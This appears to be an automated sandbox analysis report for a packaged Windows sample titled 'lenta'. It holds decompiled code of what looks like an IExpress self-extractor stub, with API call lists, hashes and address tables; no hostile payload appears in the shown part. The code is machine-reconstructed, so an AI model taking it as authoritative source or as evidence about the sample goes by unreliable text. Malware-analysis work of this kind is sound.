                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00F328E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xf39a40 = _t119;
                                                                        						 *0xf38184 = 1;
                                                                        						 *0xf38180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xf39a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xf38184 = _t135;
                                                                        							 *0xf38180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00F344B9(0, _t138);
                                                                        					L66:
                                                                        					return E00F36CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}





































                                                                        0x00f339d3
                                                                        0x00f339d8
                                                                        0x00f339da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f339dc
                                                                        0x00f339b6
                                                                        0x00f33955
                                                                        0x00f3395b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33961
                                                                        0x00f33963
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33969
                                                                        0x00f33969
                                                                        0x00000000
                                                                        0x00f33969
                                                                        0x00f33915
                                                                        0x00f33915
                                                                        0x00f3391b
                                                                        0x00f3391f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3392d
                                                                        0x00f33933
                                                                        0x00f33938
                                                                        0x00f3393a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33940
                                                                        0x00f33946
                                                                        0x00f3394b
                                                                        0x00000000
                                                                        0x00f3394b
                                                                        0x00000000
                                                                        0x00f338f2
                                                                        0x00f33843
                                                                        0x00f33845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3384b
                                                                        0x00f3384d
                                                                        0x00f33883
                                                                        0x00f33885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3389a
                                                                        0x00f3389e
                                                                        0x00f3389e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f338a0
                                                                        0x00f338a0
                                                                        0x00f338a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f338a4
                                                                        0x00000000
                                                                        0x00f338a4
                                                                        0x00f3384f
                                                                        0x00f33851
                                                                        0x00f33857
                                                                        0x00f3386e
                                                                        0x00f33877
                                                                        0x00f3387b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33881
                                                                        0x00f33859
                                                                        0x00f3385c
                                                                        0x00f33862
                                                                        0x00f33866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33868
                                                                        0x00000000
                                                                        0x00f338f4
                                                                        0x00f338f4
                                                                        0x00f338f5
                                                                        0x00f338fb
                                                                        0x00f33901
                                                                        0x00f33901
                                                                        0x00000000
                                                                        0x00f3390a
                                                                        0x00f3374b
                                                                        0x00f3374e
                                                                        0x00f3375c
                                                                        0x00f33764
                                                                        0x00f33769
                                                                        0x00f3376e
                                                                        0x00f33771
                                                                        0x00f3379c
                                                                        0x00f3379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f337a3
                                                                        0x00f337a4
                                                                        0x00000000
                                                                        0x00f337a4
                                                                        0x00f33773
                                                                        0x00f33777
                                                                        0x00f33778
                                                                        0x00f3377f
                                                                        0x00f33781
                                                                        0x00f3378e
                                                                        0x00f3378e
                                                                        0x00f33794
                                                                        0x00000000
                                                                        0x00f33794
                                                                        0x00f33783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33785
                                                                        0x00f3378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3378c
                                                                        0x00f33750
                                                                        0x00000000
                                                                        0x00f3372d
                                                                        0x00f3372d
                                                                        0x00f3396b
                                                                        0x00f3396b
                                                                        0x00f3396c
                                                                        0x00f3396e
                                                                        0x00f3396f
                                                                        0x00f33a1e
                                                                        0x00f33a1e
                                                                        0x00f33a22
                                                                        0x00f33a27
                                                                        0x00f33a3e
                                                                        0x00f33a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F33723
                                                                        • MessageBeep.USER32(00000000), ref: 00F339C3
                                                                        • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00F339F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$lenta
                                                                        • API String ID: 2519184315-4216304122
                                                                        • Opcode ID: 222fc4df22aa049b28be34b9cee47756055c93810ef9f872ac3e15f06cadde51
                                                                        • Instruction ID: 54c7b949023c27d4679f8301858a043e199bb5daab8cb716f789737a87fe64dd
                                                                        • Opcode Fuzzy Hash: 222fc4df22aa049b28be34b9cee47756055c93810ef9f872ac3e15f06cadde51
                                                                        • Instruction Fuzzy Hash: FB91F472E062249BDB34CF15CC817AA77B2AB45334F1501A9E889DB251DB788F81FF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00F36495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00F31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00F3658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00F36CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}














                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F364DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F364F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F36502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                        • API String ID: 438848745-3290281839
                                                                        • Opcode ID: ae1ae87f614d74484e9d52b8766177dc65a835616d7fe9f0f1fc196b3d9dd65e
                                                                        • Instruction ID: 7df1fe2293d93704fb39c9f2348da5c1864f142df02b44ab1bf1e567bc56c63b
                                                                        • Opcode Fuzzy Hash: ae1ae87f614d74484e9d52b8766177dc65a835616d7fe9f0f1fc196b3d9dd65e
                                                                        • Instruction Fuzzy Hash: D0012170A00108ABDB54EB60DC49AEE7739EB50330F4001A5F485E21C0DFB49E8AAA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00F32773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}


































                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00F32A6F
                                                                          • Part of subcall function 00F32773: CharUpperA.USER32(C69E30F7,00000000,00000000,00000000), ref: 00F327A8
                                                                          • Part of subcall function 00F32773: CharNextA.USER32(0000054D), ref: 00F327B5
                                                                          • Part of subcall function 00F32773: CharNextA.USER32(00000000), ref: 00F327BC
                                                                          • Part of subcall function 00F32773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32829
                                                                          • Part of subcall function 00F32773: RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32852
                                                                          • Part of subcall function 00F32773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32870
                                                                          • Part of subcall function 00F32773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F328A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F33938,?,?,?,?,-00000005), ref: 00F32958
                                                                        • GlobalLock.KERNEL32 ref: 00F32969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F33938,?,?,?,?,-00000005,?), ref: 00F32A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F32A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: 8dcb1495fe283f90c93e9f990bb48bfc8374acac39bab9090ca914ddae34293c
                                                                        • Instruction ID: 3cf54ea0a16650743b760287e6e5bc53ccf68882d884222939324757a8bd1f35
                                                                        • Opcode Fuzzy Hash: 8dcb1495fe283f90c93e9f990bb48bfc8374acac39bab9090ca914ddae34293c
                                                                        • Instruction Fuzzy Hash: 17512971E00219DBCF65CF99C884AAEBBB6FF48720F14406AE945E3211DB399941EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00F34169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00F3468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00F3468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00F344B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}






                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F330B4), ref: 00F34189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F330B4), ref: 00F341E7
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: 4fac9aeca0aaf22f4dd336ce0e7f37a2ca48d1b33cf31494ca1189f7675f5395
                                                                        • Instruction ID: 6d9d6f15c6b6db05c5c949562f0d8fc2736b05d7fe39d489b298bda61101bcdb
                                                                        • Opcode Fuzzy Hash: 4fac9aeca0aaf22f4dd336ce0e7f37a2ca48d1b33cf31494ca1189f7675f5395
                                                                        • Instruction Fuzzy Hash: FB01F4F27006183BF3252A668C86F7B718EEBD57B5F104035BB46E12809AACFC417175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00F343D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xf39a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}














                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F31A18
                                                                        • GetDesktopWindow.USER32 ref: 00F31A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00F31A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F31A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00F31A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 03e414487aba4d402a1ab002c2152bba56e203c27274e5baa7289b5cd88324b5
                                                                        • Instruction ID: efcf637ae5848fd39d183197885b4b818d583f8fecc8c0f62e2d068e40e35d60
                                                                        • Opcode Fuzzy Hash: 03e414487aba4d402a1ab002c2152bba56e203c27274e5baa7289b5cd88324b5
                                                                        • Instruction Fuzzy Hash: A6118E3160110DABDB10EF64DD08AAE77B9FB49331F108154F96292190DA34AE05FB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F37155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xf38004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xf38004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xf38008 = _t37;
                                                                        				return _t37;
                                                                        			}












                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F37182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F37191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3719A
                                                                        • GetTickCount.KERNEL32 ref: 00F371A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F371B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c2add5da002b23f833a8bf87187821a002d2e1348694aed626d04ec63efc5573
